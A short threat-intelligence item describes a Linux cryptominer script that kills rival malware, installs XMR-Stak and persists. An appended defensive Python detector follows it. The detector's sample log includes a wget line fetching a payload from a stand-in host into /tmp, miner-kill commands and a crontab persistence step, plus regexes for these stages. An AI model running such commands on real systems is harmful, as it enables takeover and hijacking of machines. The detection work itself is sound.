Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners



Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners (Feb 8, 2019)

Researchers from Trend Micro found a script on one of their honeypots that was downloading and installing cryptocurrency-mining malware onto a Linux system. The script is capable of killing and/or deleting a number of known Linux malware and cryptominers, as well as connections to other miner services and ports. After installing its own malware, it implants itself into the machine's system to survive rebooting and deletion. The script appears to be similar to the "KORKERDS" malware, but is notably different in that it does not install a rootkit or uninstall antivirus software, and it has KORKERDS in its kill list. The observed script downloads a modified version of the "XMR-Stak" cryptominer that mines for Cryptonight cryptocurrency. The infection source appears to have started from some IP cameras and web services via TCP port 8161.

Recommendation: If a device is part of the Internet of Things (IoT), it should be placed behind a firewall or network address translation (NAT) and within a Virtual Local Area Network (VLAN). Change the default password of IoT devices such as routers and printers to something that is difficult for threat actors to guess, but memorable for you. Anything that faces the internet can be vulnerable to threat actors, and malware can evolve extremely quickly, so it is crucial to stay up to date with security patches and updates.

Indicators of Compromise (IOCs) associated with this story can be viewed by ThreatStream users here to identify potential malicious activity.
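The behaviour described above (competing miners killed, a payload downloaded, then a persistence change) can be hunted as an ordered sequence in process-execution telemetry. The following is an added example, not code from Trend Micro or from the original post; the log format, host names, command patterns and thresholds are all assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed exec-audit lines "<epoch> <host> <pid> <command line>"; all values invented.
SAMPLE_LOG = """\
1549600000 cam-01 4101 pkill -f minerd
1549600001 cam-01 4102 pkill -f xmrig
1549600002 cam-01 4103 pkill -f stratum
1549600005 cam-01 4104 wget -q http://example.invalid/payload -O /tmp/.x
1549600009 cam-01 4105 crontab /tmp/.cron
1549600100 web-02 5001 pkill -f nginx
1549600200 web-02 5002 curl -s https://example.invalid/health
1549609000 db-03 6001 killall minerd
1549609001 db-03 6002 pkill xmrig
1549609002 db-03 6003 pkill -f stratum
"""

# Assumed command patterns for each stage; tune them to your own telemetry.
KILL = re.compile(r"^(pkill|killall|kill)\b")
FETCH = re.compile(r"^(wget|curl)\b")
PERSIST = re.compile(r"^(crontab|systemctl\s+enable)\b|/etc/(cron|rc\.local|init\.d)")

def parse(log):
    """Yield (timestamp, host, command) for each well-formed line."""
    for line in log.splitlines():
        parts = line.split(None, 3)
        if len(parts) == 4 and parts[0].isdigit():
            yield int(parts[0]), parts[1], parts[3]

def detect(log, window=300, min_kills=3):
    """Flag hosts with >= min_kills kills, then a download, then persistence, in `window` s."""
    by_host = defaultdict(list)
    for ts, host, cmd in parse(log):
        by_host[host].append((ts, cmd))
    alerts = []
    for host, events in sorted(by_host.items()):
        events.sort()
        kills = [ts for ts, cmd in events if KILL.match(cmd)]
        for i in range(len(kills) - min_kills + 1):
            start, last_kill = kills[i], kills[i + min_kills - 1]
            end = start + window
            fetch = next((ts for ts, c in events
                          if FETCH.match(c) and last_kill <= ts <= end), None)
            persist = fetch is not None and next(
                (ts for ts, c in events if PERSIST.search(c) and fetch <= ts <= end), None)
            if persist:
                alerts.append({"host": host, "start": start, "persist_at": persist})
                break  # one alert per host
    return alerts
```

Only `cam-01` is flagged in the sample: `web-02` has a single kill and a routine download, and `db-03` kills miners but never downloads or persists anything.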